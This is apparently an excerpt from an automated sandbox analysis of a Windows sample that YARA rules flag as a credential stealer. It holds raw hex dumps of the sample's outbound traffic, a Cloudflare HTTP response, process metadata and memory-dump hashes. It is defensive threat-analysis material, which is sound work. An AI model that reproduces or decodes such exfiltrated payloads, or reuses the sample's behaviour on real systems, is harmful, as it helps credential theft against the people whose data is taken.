2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 28 33 6f d5 6b 6a 60 f8 7c e9 33 b8 8a 6e 1e 98 35 4e e6 18 7b 0b 24 8f d8 56 2f 9c 8a 61 ef df 09 0d db c3 55 85 85 b8 28 28 66 3c d2 05 2e ed 70 c0 4e be e0 f5 3d 9a f9 85 d4 f8 5b 1b 10 61 6c 77 49 f0 06 33 39 18 70 20 e1 84 ee 1f a1 7f 46 d7 7c 27 40 1c c7 e9 95 2f 10 05 70 dd f7 27 14 61 60 e4 b3 29 20 f6 fa 98 9e 0e fa 02 23 c7 9e 99 08 58 5b ca 0a 2e dd 3f fa 4f 48 31 b0 3f 3f 5d 3c 98 75 24 4b a1 5b 03 1c 7f d8 bc 12 50 b6 2a 9f 55 76 84 38 50 3b b3 34 f1 45 1f 60 29 f5 dc 17 3c cd ae 35 e6 63 ac c6 a5 c6 df 65 ed 29 0d 2f f2 2d af 43 a0 94 56 22 7f 9a 93 89 a6 8e 8d 86 be 57 49 38 dd dc 44 62 74 05 7f 84 11 6b 03 9c 12 57 1c da 14 d9 b1 30 ea 08 32 3c 14 9a 20 58 08 d5 ba 9b 51 c3 85 c1 da 21 4a c5 e7 83 da f0 9d 2b a8 bf 6f eb ec a1 fe 84 13 0e
Data Ascii: (3okj`|3n5N{$V/aU((f<.pN=[alwI39p F|'@/p'a`) #X[.?OH1??]<u$K[P*Uv8P;4E`)<5ce)/-CV"WI8DbtkW02< XQ!J+o
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 8e 33 bc 00 be 2f 65 11 3a ea 8e d3 2f b5 86 07 da a1 31 6f bf f4 db 0e 93 fc 8d 33 da 78 53 65 41 9f d2 d1 d4 53 40 a3 34 4b 01 14 64 be 08 8d 44 bd 4c cb 61 31 bd aa b2 71 6f df 40 58 19 76 70 89 a7 72 22 d2 6d be ad 99 bf 77 e3 46 f0 84 eb 2e c9 be 63 06 05 66 07 70 af 15 08 b8 77 d8 0e 13 5d 04 80 b5 6c f3 02 b3 3f 0a 91 70 72 1a b5 d6 13 d0 2e 20 22 6e 64 78 f5 ad d0 ac 00 d1 36 a9 c0 1a 14 d8 bb 12 95 32 ae 92 a9 86 b8 3e 15 90 7b 44 a6 60 17 b0 3b 91 46 30 85 53 4d c8 84 ec 5e 8c 57 cd 0f c2 6a 77 9c 22 51 5c 90 8f ef 12 8a 3c 1c 41 75 9a e2 9a fc 24 4b 8b d7 12 f7 85 96 19 60 74 fd 6f bd 39 82 b5 e3 d6 f1 9b 5c 06 29 59 26 3f c1 5b 0c 82 17 f8 f1 10 9f 05 91 f9 d8 00 a1 86 5d 3f 4b 3c 3b f1 c6 f5 08 df c2 0a 2b 4e c9 6b 7e cf ac d4 01 61 ce 39 dc
Data Ascii: 3/e:/1o3xSeAS@4KdDLa1qo@Xvpr"mwF.cfpw]l?pr. "ndx62>{D`;F0SM^Wjw"Q\<Au$K`to9\)Y&?[]?K<;+Nk~a9
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 4c 3c 4f 98 4e a7 d4 9c dc ef 3b d9 ab 58 fc aa 48 70 ca 07 cd 35 c6 f5 ad 24 80 b7 37 de 77 9f 56 ee 6e 39 15 9c 02 40 82 ac cc d8 c5 d9 b4 62 7c 5f 50 b6 ab d5 18 cf 21 ad 26 bf 00 96 12 9f cc c3 7d 05 5a 9c 9b 3a c9 28 03 2f 50 ba dd e8 3a 7b ee 0c b3 61 ed a0 9d e7 5d 63 fc e6 f8 fb a2 0f d5 9d 90 3b a2 79 d0 c3 5b d1 ed 89 f7 c9 74 12 7e 3e 7f 75 b8 a2 d2 b5 d5 e4 58 38 75 dc 6f 65 f3 ef e3 07 e3 2a 64 33 38 e0 3e 83 99 5e 9f be 9e 59 61 a7 01 96 1e f1 82 fc c1 6e 6d f5 b5 5a fe 2e dd f9 b5 e6 57 82 e6 a1 83 3d 93 cd d4 80 cd df 6c 34 3d 7f 50 13 0b 31 12 2f 32 83 cc b7 f7 16 de cb 1f da a8 18 8f d6 a6 0a 57 ad 31 93 53 79 09 60 be ca 5c 2d 7e 70 c8 ff 01 0e 6e c6 32 77 01 86 f8 4b 47 49 c0 2c e9 c0 06 5f e0 03 34 49 34 7d ff 9a 37 90 40 1b 14 e3 e6
Data Ascii: L<ON;XHp5$7wVn9@b|_P!&}Z:(/P:{a]c;y[t~>uX8uoe*d38>^YanmZ.W=l4=P1/2W1Sy`\-~pn2wKGI,_4I4}7@
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 03 ef 90 bd f2 d3 3f fa 26 0f a3 60 17 a6 f9 e3 12 30 67 b9 dd 20 d4 e9 ac 2c 11 f1 a6 0b b6 9b f7 b4 03 30 6a 5c 3d 21 00 52 a3 e7 ef 6a 48 03 31 5d 60 0a 5a cb 81 87 b8 d1 f0 23 7a f5 de be 8b 74 31 10 88 e2 f4 87 d1 51 40 e2 0e 6e ec 07 cf b2 1f 84 65 ff 82 18 22 ec 67 f1 f9 fb 17 92 c6 b7 8f 90 41 f4 ca ec 7c 2c 5c 2e 77 03 65 07 dc 65 c3 c4 80 5d 76 56 41 6b 33 fe 52 64 7c 39 d6 eb e4 d3 36 47 fd 39 cb 91 ea 98 9b 93 3c 1d 92 b0 94 d0 1e 91 3f bd 29 4c 0d c2 66 c9 76 9b ce 0c 39 51 54 24 1c ee 89 3e 0f f0 10 fb b4 14 96 8b 60 00 68 43 87 51 b9 07 29 a2 af aa fd 2c 23 76 8d 70 75 3c 71 8e 0d c7 44 f3 08 dc fd f3 dd e8 8f 6e 33 f6 0f 1f b9 6f da 23 15 89 98 67 b9 78 ee e4 b4 3c 89 40 34 36 16 e6 c1 9a b6 51 ce f1 f3 97 2f 94 97 6f 4a cc 5d ee b7 b9 4b
Data Ascii: ?&`0g ,0j\=!RjH1]`Z#zt1Q@ne"gA|,\.wee]vVAk3Rd|96G9<?)Lfv9QT$>`hCQ),#vpu<qDn3o#gx<@46Q/oJ]K
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 30 99 e1 10 19 8c da 04 1b d7 96 3a 37 5e bd e7 de 5a 19 07 d3 a2 c0 ee c2 f6 4e 65 c4 1f fc 0f 0d 9f cd 07 04 9f 7c 3e f0 7e 0f 1a 71 4f 40 ca 24 28 90 c5 4f 73 83 b4 0b 31 d4 57 10 5c 29 a7 06 ba 13 ce 80 82 d4 5e 4d 28 e8 90 62 81 28 f8 23 d7 27 77 d2 c7 7d d8 79 3f 68 dc dc ee 9f d6 8b 4f 39 c3 33 ff ce 6e 66 01 b6 ba 48 7f 8f e7 c2 4e 5f 5d b6 c9 74 e6 41 f5 66 ab d7 a4 8b ca 46 81 70 42 a4 6c 6a e4 3d ae 1d 1d 47 3f 39 ef 9b 94 e0 cb 33 e4 5d f1 7f 4b 44 3c 7e fa d9 e2 a7 02 e4 27 91 ad fc c7 88 c7 c0 31 44 25 3a fd cd 08 e5 fd 41 3b b8 53 86 21 3b bb 03 75 ed 74 3c 8a c4 a3 81 ba 20 52 3b 66 ed 87 3e 37 03 88 2e f2 08 e5 5c d3 51 23 74 c5 c0 a5 e4 d7 4f 9e b2 b2 76 2b 4c f2 61 b6 d0 f3 d6 8d 59 ea 49 e4 a4 31 31 ae ce 04 fc 12 7e 11 bf 3e 2d 57 15
Data Ascii: 0:7^ZNe|>~qO@$(Os1W\)^M(b(#'w}y?hO93nfHN_]tAfFpBlj=G?93]KD<~'1D%:A;S!;ut< R;f>7.\Q#tOv+LaYI11~>-W
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 52 b8 61 a1 80 c7 bd 85 58 c0 c4 0e 7d 7b 51 a6 ac 91 78 7d b5 80 92 00 53 ad 8d 4e 84 e9 f4 a1 15 35 06 a0 65 dc a1 09 80 66 27 b9 b1 75 f9 bb f7 ba 43 93 96 c7 e3 f2 73 ec 52 ae 7c 2e 5e 16 0c 69 9d 1c 0d 3f b9 f0 f8 dd 6e 44 59 4b fd a5 d1 cf b7 5a 05 5f a2 2e 17 dc 5c 58 5d 24 13 91 0b ff 7b d4 b2 0c b9 e8 dc b7 c5 68 96 3b 32 f6 9d f0 f9 f2 e7 6c 9e d6 9b d1 9c 84 ef ec 8d d1 44 da 8a 22 63 07 4b c1 83 38 3c 36 39 4b 09 fe a0 c2 60 ff e2 c6 a1 d3 a2 e0 54 35 31 f3 cc 3d 13 9e a7 1c eb 87 a6 bc e0 64 ea c1 bc 1c be 85 b6 45 37 47 ea 9b ad 92 e8 f9 d5 57 04 de 64 f1 1b df ae c3 cc 68 75 8f 3d af 46 de 57 d9 22 b2 0f db 69 70 7f 59 87 51 55 c1 07 9d 2e 3d 24 12 17 ab 56 cd 35 61 c7 b4 a9 1c fd fe f2 ad cf ad 0b 07 82 32 5e 5d 97 88 3f 33 cb 70 fe 4c a0
Data Ascii: RaX}{Qx}SN5ef'uCsR|.^i?nDYKZ_.\X]${h;2lD"cK8<69K`T51=dE7GWdhu=FW"ipYQU.=$V5a2^]?3pL
2024-12-16 16:15:16 UTC | 15331 | OUT | Data Raw: 09 1b 01 6d 04 62 58 06 47 d1 b7 bf a3 d2 79 63 61 bf 9a d2 13 85 7c 60 06 07 95 51 ed 28 f6 e3 6c bc df 35 f3 fa 8b db fe 27 2f 04 9f bf d2 66 af a6 b5 f8 be 6a 16 ba 64 77 16 6b 94 6e 50 78 ae 54 f8 c1 54 d9 aa c1 5b 4d 5b 5b 71 96 ac e6 3e a6 52 ba eb b5 53 da 6d 52 0e e7 a5 f8 4c 49 81 41 cb 6d 89 31 0e 1f f6 44 d3 7d 96 77 85 07 bd 5b d8 82 b0 57 d9 31 5a 34 63 d1 fb b5 45 4b af d2 cd 8f 0d 0d a2 5b a7 e5 10 e7 22 a9 ab bc 03 2b 52 94 71 1c 2d d5 b8 68 b3 38 77 a3 e0 5b 40 0a 45 9f 73 ff 45 b3 47 be dc f3 f7 29 5b b7 d9 39 a3 1f ca 45 b9 5e b7 cb 6d ea a4 ad cf da 98 bd a7 df 2c 9d bf dd fc ee d5 db d0 e9 47 39 ed 2b 21 82 8b cc b6 ac fd 96 b9 52 0a 15 57 84 c8 e5 36 e2 dc 37 88 23 f3 af 5e 4e b9 7d b2 9e 5d 91 28 5f 49 ee f4 b7 50 b9 60 11 5c f5 2e
Data Ascii: mbXGyca|`Q(l5'/fjdwknPxTT[M[[q>RSmRLIAm1D}w[W1Z4cEK["+Rq-h8w[@EsEG)[9E^m,G9+!RW67#^N}](_IP`\.
2024-12-16 16:15:19 UTC | 1015 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 16:15:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=48h62a6j1lt7ldenoui0bgbur9; expires=Fri, 11-Apr-2025 10:01:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBFiQUJmQqynXTqes5eWtAWmBmQOq8h0u5GI7qaLpqVszfyzYnvxIwRrcRWOvgB51MWd4o3zn7HwzmtE0voTdYMI%2FwskpJqOsM0jB7cLrj6k1bqDKyexgsNWGEP3hkjFJE4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2ff8a2bee67ca8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1994&rtt_var=769&sent=292&recv=610&lost=0&retrans=0&sent_bytes=2838&recv_bytes=590295&delivery_rate=1403171&cwnd=238&unsent_bytes=0&cid=76b246a112e9d80a&ts=2550&x=0"



Target ID: 0
Start time: 11:14:58
Start date: 16/12/2024
Path: C:\Users\user\Desktop\wf1Ps82LYF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\wf1Ps82LYF.exe"
Imagebase: 0x8a0000
File size: 1'884'672 bytes
MD5 hash: 9B88AFC4511D0FE8ACA6080D34F2DD66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Offset: 01068000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1068000_wf1Ps82LYF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
• Instruction ID: 99c948993cde92b7031c668009cb04e89e1212e77fca5c277496ae41edb74eb4
• Opcode Fuzzy Hash: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
• Instruction Fuzzy Hash: 6D41BE3504A3959BC71ACF30D685A86BFA4FF4731072882CEE4815F123C371665ADB96

Memory Dump Source
• Source File: 00000000.00000003.1537108553.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, Offset: 059E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_59e1000_wf1Ps82LYF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
• Instruction ID: 18a7979182142c6a76a9746b1ff6eda87dd2aa675668835bad91b95888c631b4
• Opcode Fuzzy Hash: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
• Instruction Fuzzy Hash: 4F41CF3500A3959BC71BCF30D686A87BFA5FF47310728828EE4815F223C370665ADB96